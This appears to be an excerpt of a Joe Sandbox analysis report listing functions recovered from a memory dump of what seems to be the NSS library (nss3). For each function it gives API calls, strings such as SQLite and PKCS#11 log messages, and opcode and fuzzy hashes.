String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: 8a6a182556a7595147cf5173e429b7aac50e2b34e1401fe8f3d496d171323643
Instruction ID: bc782fe6d5957d40034508daf6788fc330ec0232ef487b21b16a416e3ef0174b
Opcode Fuzzy Hash: 8a6a182556a7595147cf5173e429b7aac50e2b34e1401fe8f3d496d171323643
Instruction Fuzzy Hash: 554143716006008BE7208F58D898BA673A3BF8231CF18093CE8654FB40D77AE817CF99

Function 6C7CA470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7CA4A6

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

PORT_Alloc_Util.NSS3(?), ref: 6C7CA4EC

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C7CA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C7CA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C7CA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7CA596
free.MOZGLUE(?), ref: 6C7CA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7CA5B6

Strings

^jxl, xrefs: 6C7CA475

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID: ^jxl
API String ID: 3906949479-3962845174
Opcode ID: d59d2409a72e5ac7444ccb5783f70cd6ca8a2ddeeda5b3502df4355ed8274ef3
Instruction ID: 21d672017d25759cfc15abdc80ce7caa60389861f33fd670c4bf827b1343a655
Opcode Fuzzy Hash: d59d2409a72e5ac7444ccb5783f70cd6ca8a2ddeeda5b3502df4355ed8274ef3
Instruction Fuzzy Hash: 5C411771B042439FDB10CF59DE40BAABBB1AF40318F15C478D8695BB42E732E919C7A2

Function 6C6F6600 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 95COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,NULL), ref: 6C6F6C66
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0001F490,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F6C83

Strings

unopened, xrefs: 6C6F6C9F
misuse, xrefs: 6C6F6C78
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F6C6E
invalid, xrefs: 6C6F6C95
%s at line %d of [%.10s], xrefs: 6C6F6C7D
API call with %s database connection pointer, xrefs: 6C6F6C60
NULL, xrefs: 6C6F6C55, 6C6F6C5F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 632333372-4248800309
Opcode ID: 420f7fd0a5b249cd8aced8a2bfcc1de17f24098eb535b6b18c69f9c7f71f84b9
Instruction ID: 0cbb14401bc538a9ad5d5607c95e24d58f3d3a2885cd4c9f1137c07db3eb3963
Opcode Fuzzy Hash: 420f7fd0a5b249cd8aced8a2bfcc1de17f24098eb535b6b18c69f9c7f71f84b9
Instruction Fuzzy Hash: 23317872B001009BEB108E698D917AB3BA3EB4131CF044528DD38DBB81D730D94783D5

Function 6C7A6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C7A6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6CA3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A6CD5

Strings

pMechanism = 0x%p, xrefs: 6C7A6CD0
(CK_INVALID_HANDLE), xrefs: 6C7A6C9C
hSession = 0x%x, xrefs: 6C7A6C7E, 6C7A6C8E
C_DigestInit, xrefs: 6C7A6C61

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: b13b5b458fae85f5e85c830957ba1f6d736cd8630f46a9a8903c989b927b1960
Instruction ID: cea1f0e0e8c0deab1e154d8d3909dee32d204ea93811d88b772e29b4c9ab9e2d
Opcode Fuzzy Hash: b13b5b458fae85f5e85c830957ba1f6d736cd8630f46a9a8903c989b927b1960
Instruction Fuzzy Hash: 4821E331602114ABDB209BA89F8DB9A77B5EB4631DF448535E80997B02DB34BE09C7D2

Function 6C770F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C770F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C770F84

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C78F59B,6C89890C,?), ref: 6C770FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C770FC1

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C770FDB
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C770FEF
PL_FreeArenaPool.NSS3(?), ref: 6C771001
PL_FinishArenaPool.NSS3(?), ref: 6C771009

Strings

security, xrefs: 6C770F5C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: ba143f651d26496e45517994c0fc80867c658541e2a7c52f8c4bebb9ddb2acd4
Instruction ID: 653c0276bede34dc106a822bf4594aea11cbc948d1b0fa73d99b0ca8fb56cb94
Opcode Fuzzy Hash: ba143f651d26496e45517994c0fc80867c658541e2a7c52f8c4bebb9ddb2acd4
Instruction Fuzzy Hash: 89212B71904304ABDB209F24DE45AAB77B4EF4525CF048928FC1897701F731E645C7E2

Function 6C776DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C777D8F,6C777D8F,?,?), ref: 6C776DC8

Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7CFE08
Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7CFE1D
Part of subcall function 6C7CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7CFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C777D8F,?,?), ref: 6C776DD5

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FA0,00000000,?,?,?,?,6C777D8F,?,?), ref: 6C776DF7

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C776E35

Part of subcall function 6C7CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C7CFE29
Part of subcall function 6C7CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C7CFE3D
Part of subcall function 6C7CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C7CFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C776E4C

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FE0,00000000), ref: 6C776E82

Part of subcall function 6C776AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C77B21D,00000000,00000000,6C77B219,?,6C776BFB,00000000,?,00000000,00000000,?,?,?,6C77B21D), ref: 6C776B01
Part of subcall function 6C776AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C776B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C776F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C776F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FE0,00000000), ref: 6C776F6B
PR_SetError.NSS3(FFFFE005,00000000,6C777D8F,?,?), ref: 6C776FE1

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: ceb873ad1b8a6cba2c5bfbc30416a6e34eb2e89637164e3023bc8a26a6daf788
Instruction ID: a76f8d816472f364106ef560005530a98d291cdb9ae01cbce10d179df4bf0630
Opcode Fuzzy Hash: ceb873ad1b8a6cba2c5bfbc30416a6e34eb2e89637164e3023bc8a26a6daf788
Instruction Fuzzy Hash: AE717071E1064A9FDB10CF55CE44BAABBA8FF54308F154229E808D7B15F770EA94CBA0

Function 6C7B0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7B1085
PK11_GetAllTokens.NSS3 ref: 6C7B10B1
free.MOZGLUE(?), ref: 6C7B1107
PR_SetError.NSS3(00000000,00000000), ref: 6C7B1172
free.MOZGLUE(?), ref: 6C7B1182
free.MOZGLUE(?), ref: 6C7B11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7B11C5

Part of subcall function 6C7B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C78EAC5,00000001), ref: 6C7B52DF
Part of subcall function 6C7B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C7B52F3
Part of subcall function 6C7B52C0: PR_Unlock.NSS3(?), ref: 6C7B5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7B11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7B11F3

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: ca05a993eb323239df147db7037097239f6b9b1565d1b8bb926867165803a501
Instruction ID: f410fb59c18849ea512567f5fc8e6b9767277884fe42e4c65313e76b44abf7b1
Opcode Fuzzy Hash: ca05a993eb323239df147db7037097239f6b9b1565d1b8bb926867165803a501
Instruction Fuzzy Hash: 166193B4E013499BEB10DF68DA89BAEB7B5AF04348F144138EC19BB741E731E945CB91

Function 6C7BADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEF1
free.MOZGLUE(6C79CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C79CDBB,?), ref: 6C7BAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAF30

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: c7eb1ceaf0e72d95042554202e78564e14487a9db68bbceaa298ec3d7586192b
Instruction ID: 9f2299460153541df95634fb5d97584b3b2ef870f968f80d0d6330e1e058bcfc
Opcode Fuzzy Hash: c7eb1ceaf0e72d95042554202e78564e14487a9db68bbceaa298ec3d7586192b
Instruction Fuzzy Hash: E3519FB5A00602AFDB11EF29D989B56B7B4FF04328F144675E808A7E11E731F964CBD1

Function 6C794CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C79AB7F,?,00000000,?), ref: 6C794CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C79AB7F,?,00000000,?), ref: 6C794CC8
TlsGetValue.KERNEL32(?,6C79AB7F,?,00000000,?), ref: 6C794CE0
EnterCriticalSection.KERNEL32(?,?,6C79AB7F,?,00000000,?), ref: 6C794CF4
PL_HashTableLookup.NSS3(?,?,?,6C79AB7F,?,00000000,?), ref: 6C794D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C794D10

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C794D26

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C794D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C794DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C794E02

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: db6ea02d13881ec8073b4277fad44fe13ba8c082fb748e7d07730171263d2567
Instruction ID: 874c13a10434f642dd3e9e18c86cfdab3286a84f55047005acddcac9b28df0ee
Opcode Fuzzy Hash: db6ea02d13881ec8073b4277fad44fe13ba8c082fb748e7d07730171263d2567
Instruction Fuzzy Hash: 8A41E7B9A00101ABEB119F28FE49A6677B8BF1621DF044170ED19C7B22FB31D924C7E1

Function 6C772E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E

Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C779003,?), ref: 6C7CFD91
Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(A4686C7D,?), ref: 6C7CFDA2
Part of subcall function 6C7CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7D,?,?), ref: 6C7CFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33

Part of subcall function 6C7CFD80: free.MOZGLUE(00000000,?,?), ref: 6C7CFDD1

TlsGetValue.KERNEL32 ref: 6C772E4E
EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
PL_HashTableLookup.NSS3(?), ref: 6C772E71
PL_HashTableRemove.NSS3(?), ref: 6C772E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
PR_Unlock.NSS3 ref: 6C772EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C772EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C772EC5

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 7bab4410470cbaa171719266419529daaa244b9961cd1003c7e2b9dab6ba6cb9
Instruction ID: bfb03e5483728df5e84fe9ea5d53cb48ad9dd76491ff9dd245375c0d38318d85
Opcode Fuzzy Hash: 7bab4410470cbaa171719266419529daaa244b9961cd1003c7e2b9dab6ba6cb9
Instruction Fuzzy Hash: 2821DA76A40105ABDF211B29ED0DA9B3B79DB5235DF040530ED2886B11FB32D958D7E1

Function 6C800690 Relevance: 15.1, APIs: 10, Instructions: 57threadCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000000,?,?,6C800642,?,?,6C80477E,00000000), ref: 6C800695

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewLock.NSS3(00000000,?,?,6C800642,?,?,6C80477E,00000000), ref: 6C8006A1

Part of subcall function 6C8398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C839946
Part of subcall function 6C8398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F16B7,00000000), ref: 6C83994E
Part of subcall function 6C8398D0: free.MOZGLUE(00000000), ref: 6C83995E

PR_GetCurrentThread.NSS3(00000000,?,?,6C800642,?,?,6C80477E,00000000), ref: 6C8006BB
DeleteCriticalSection.KERNEL32(?,00000000,?,?,6C800642,?,?,6C80477E,00000000), ref: 6C8006D1
free.MOZGLUE(?,?,?,6C800642,?,?,6C80477E,00000000), ref: 6C8006D8
PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,?,6C800642,?,?,6C80477E,00000000), ref: 6C8006F4

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C80070A
free.MOZGLUE(?), ref: 6C800711
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C80072D
PR_SetError.NSS3(?,00000000), ref: 6C800738

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$CriticalSectionfree$DeleteLock$CountCurrentInitializeLastSpinThreadValuecalloc
String ID:
API String ID: 3345202482-0
Opcode ID: e8b709d0e25841b562e4e449798dda25283415cb61f909ab1a0fb0b7996e4f2c
Instruction ID: 0900240567364e1e033c2283da2688d31f73f7e58b465acdb916e0dfb75c3a44
Opcode Fuzzy Hash: e8b709d0e25841b562e4e449798dda25283415cb61f909ab1a0fb0b7996e4f2c
Instruction Fuzzy Hash: 0E110CB1B006666BDA30AFA88E0D74E3778AB9271DF100834E90997F01EB79E505C7D2

Function 6C8166A0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 358COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(00000000), ref: 6C81690A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C816999
PK11_ImportDataKey.NSS3(00000000,0000402A,00000004,0000010C,?,00000000), ref: 6C8169E3

Part of subcall function 6C7FF060: PR_SetError.NSS3(FFFFE013,00000000,?,?,?,hrr ech accept confirmation,?,6C8167A0,?,?,?), ref: 6C7FF08A

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C816A1F
PK11_FreeSymKey.NSS3(?), ref: 6C816A3F
PK11_FreeSymKey.NSS3(?), ref: 6C816A58

